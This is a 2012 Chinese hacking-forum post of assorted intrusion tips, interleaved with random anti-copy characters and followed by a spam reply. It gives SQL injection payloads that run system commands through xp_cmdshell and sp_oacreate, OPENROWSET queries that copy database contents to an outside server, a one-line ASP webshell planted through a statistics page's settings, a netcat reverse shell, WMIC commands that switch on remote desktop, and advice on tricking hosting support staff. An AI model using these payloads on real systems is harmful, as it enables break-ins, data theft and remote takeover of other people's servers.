找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 站库分离的方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3217|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
/ g, P/ @) L1 k1 ]4 h8 Y3 K
) o) C. i; a" i$ ?3 U! i) n$ F
8 v3 E9 E! D" b" mSA点数据库分离搞法+语句:
* _1 v4 `, S# R& ~2 i3 }* N! J6 m$ {3 I: A
; I' q2 V; z2 ?. i1 O2 E8 l; O+ H: B注射点不显错,执行下面三条语句页面都返回正常。5 q$ b- G9 {3 \, r! a3 b
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')) O+ F. s! `# d$ h
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'), d* `$ z/ ?, P- \
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
% Q4 V1 w& a. Y) P1 f" I可以列目录,判断系统为2000,web与数据库分离8 [/ O, y. [3 g+ w! p
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
  D  }7 {, E) W6 \' P- g在注射点上执行
+ |1 j3 Y  T3 _4 q, C3 I" h0 Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--4 a* d- K% ?/ z/ o" r
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
" z( }8 H: p/ l0 ~还有我用NC监听得其他端口都没有得到IP。& F9 L+ a, J1 T9 _/ W6 j# ]3 e9 F1 Y5 b

3 t) I6 }- Z* @, G$ p通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
+ ?" Y4 a( o1 d8 ^7 O8 {'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
8 w, Q/ A# G% ]% G2 f3 X3 L& V, Y0 z* i8 i& e! I$ u
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
* r( c1 S) e+ x3 B
( @+ q$ b$ M% ^  C  ~. z现在就猜想是不是数据库是内网而且不能连外网。
+ Q/ _6 U- N# b; Z+ v& R
( X8 L/ H, @! ~( t$ d4 ]" ?0 }, l5 G2 t
access导出txt文本代码
7 O( {. X6 U9 G1 {SELECT * into [test.txt] in 'd:\web\' 'text;' from admin' Z3 O  X9 {! h) a

+ P8 m& L4 m5 z+ H* ]: \) W3 T6 Q! @* M+ G

4 n  z# {) i4 A% d自动跳转到指定网站代码头
% H$ @" Y$ [- w- U% e! I/ w) k. D<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
; e8 S8 c6 H- ]4 c( W' _# X! ]. v& `& w+ M4 [5 N
% w) x1 Z/ ]0 a! K2 ~
入侵java or jsp站点时默认配置文件路径:
0 {! ?# [* `% E; H( w3 W\web-inf\web.xml: J9 G0 h' J5 e% M* L& @+ ^
tomcat下的配置文件位置:; @3 ?9 s0 E* F1 n7 j, [3 P
\conf\server.xml            (前面加上tomcat路径)
. w3 ~; }2 J# S( _& Y\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
1 i8 }+ F* `" g- V9 W. H
! N" z. i7 H4 }& D/ p! W4 y$ G2 e) i

4 @/ ]! Q/ L4 ^1 E" |, U检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
  a* N, x* [' L9 [9 o" {+ q% W-1%23
3 Y; u+ r* r8 D>
9 }9 ^  L/ D( Y0 t<
4 B! r6 P. L; G. \' G) b1'+or+'1'='1
5 H- E; F2 W, A% D+ ?/ J2 Mid=8%bf
2 \  `/ B9 t  L" P" h) [
# M; |7 i0 G# P  K; ]全新注入点检测试法:
2 d% A( ~( `: X在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。, P0 D+ C2 ^8 a: I, N6 J+ ?
6 x4 o/ T) x; b: x
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
& m  U( l$ N( ~  x3 p+ _. p( U8 h3 j' s
搜索型注入判断方法:9 v9 Y! q6 H$ p. s0 @& j
北京%' and '1'='1' and '%'='
- {' D" a3 x/ Q北京%' and '1'='2' and '%'='
; V/ A# ~9 q: C$ J& D' s: m+ Q+ F; b$ s( A9 S
4 `$ ]2 U- I4 X5 N$ b3 q7 h" E# V
COOKIES注入:0 o( |$ g+ Z0 ], e+ K

7 b/ D+ h" Y+ _! b$ Pjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
8 l9 Y! O/ l/ u7 l
* C0 }2 b# k: Y6 W/ d/ v: A0 h# J8 i2000专业版查看本地登录用户命令:9 t  d8 ]* }/ [6 m0 S
net config workstation7 {! n, V- R5 L, o% n6 ?

" J2 C3 f5 v+ N8 i: Q. i. p" ~- }5 D) d& n- e' C+ u
2003下查看ipsec配置和默认防火墙配置命令:
( f9 L; ]/ r& g& l& H' O, m1 n6 ^# @netsh firewall show config) }2 I2 f- O/ |
netsh ipsec static show all
) u! O# G1 @8 K
6 H0 Z! D- V) F3 X+ |9 e不指派指定策略命令:
7 Z/ p# e  _! ~4 l6 |2 ^netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)! Q0 x, j# o7 [2 w$ r$ q
netsh ipsec static show policy all  显示策略名: `8 q. m! W3 d- ]4 Y$ r) X
. G3 W" m% j# x/ @' Z# x

5 s2 g, p! `. `; e$ Y猜管理员后台小技巧:' [" m5 F, J8 q, [7 H( _- p
admin/left.asp
: u5 w0 K* c! t5 i8 s+ H5 Nadmin/main.asp2 v% @) ]' }9 E
admin/top.asp
/ z+ _2 _. x1 Eadmin/admin.asp - F0 e# |. R/ h) w! \0 V
会现出菜单导航,然后迅雷下载全部链接
- t4 s0 A, i$ }# Z( A& P3 `) k) A9 x
- k( r" }0 r6 [. p- `9 u
% J) D7 }9 @, o社会工程学:" o6 D' O) {- p; ?* @
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人$ ^, v* q  G, p' M
然后去骗客服
( m/ R/ o0 h5 a% V# j+ y, w! N. V0 A

: z. W% O& f4 f统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: ) w2 c1 x) C5 I7 V7 q6 x4 I9 V! [
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
( N$ E+ L. N* P3 t  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。) y& L3 W, N6 n8 D1 Z6 w  I3 L
$ S3 S" }) x3 j

+ }; D* A( b8 d0 e1 N
* G0 |  N9 y( L9 n5 L+ e6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
% d0 Z% K9 t& D6 B4 w3 U" i/ V2 M% h- v. z
8 T: Q$ d- k+ Y  ]1 D
0 o) p7 A8 o  ]0 i9 m! T7 z8 ?9 `+ C; H
CMD加密注册表位置
$ L/ o! q6 J! V7 \(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor' ^6 P5 A( i0 u. Z. Y. Y' k/ H  p
AutoRun
7 p8 t) e0 O0 }* E# w/ r  ?" w/ o" z2 v" O
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
* T$ M" {8 s# p. _AutoRun$ y: c6 C+ U" _/ H% d- M
% h$ i7 }! h% _! I
# Z- @# D+ d7 O; g8 |  C5 D2 U
在找注入时搜索Hidden,把他改成test( U2 L% r. u8 X0 s/ [' O. D
) `" G9 G1 u( X: I, u/ l+ N# O
  l* C$ H, e# q

0 Y) j$ P, S0 s: d, _mstsc /v:IP /console ( P/ t6 {' G* ?2 P: K
4 y: @1 g6 I$ d6 H' k! H- P4 K. s

2 o- Q% Z: u, g+ h( }( b一句话开3389:  `+ w; N* c4 |7 E1 e9 S7 K

& b" E5 w5 ^3 K  k  K- [) `# W最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  : Y0 C9 J* {% f, p
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
( M" U1 c4 l" R8 c+ Z; r0 Z' N( K6 H9 p+ |& w" c, l1 |; f2 }/ U/ U7 c
1 e% e6 @9 g, g: S
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:7 H# S# g: d8 a; @
Insert into admin(user,pwd) values('test','test')1 O' }" {& \) m# f  }
/ }! Z. g6 A! a

0 A) I. `: ~! q- V$ k: X; d$ _( e% XNC反弹! C6 |+ f( `. x' N
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   & d* v  r; }/ ^% A# G( l. [
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行), N7 _" |" Y' F. s9 H$ a

' n3 l1 G$ E. r2 ]4 s! d& l; g; T; b% Q" \7 i3 F
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
: C" ]8 F: z( b0 b& `0 |" j$ ]* X; o  m' L" I( H6 \
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
) H6 a" G$ r* r8 ^* s* Z( k例如:
* R, u* _2 o7 T! X8 n; G3 D: G. gsubst k: d:\www\ 用d盘www目录替代k盘
6 f% I: p0 _& h, i  rsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表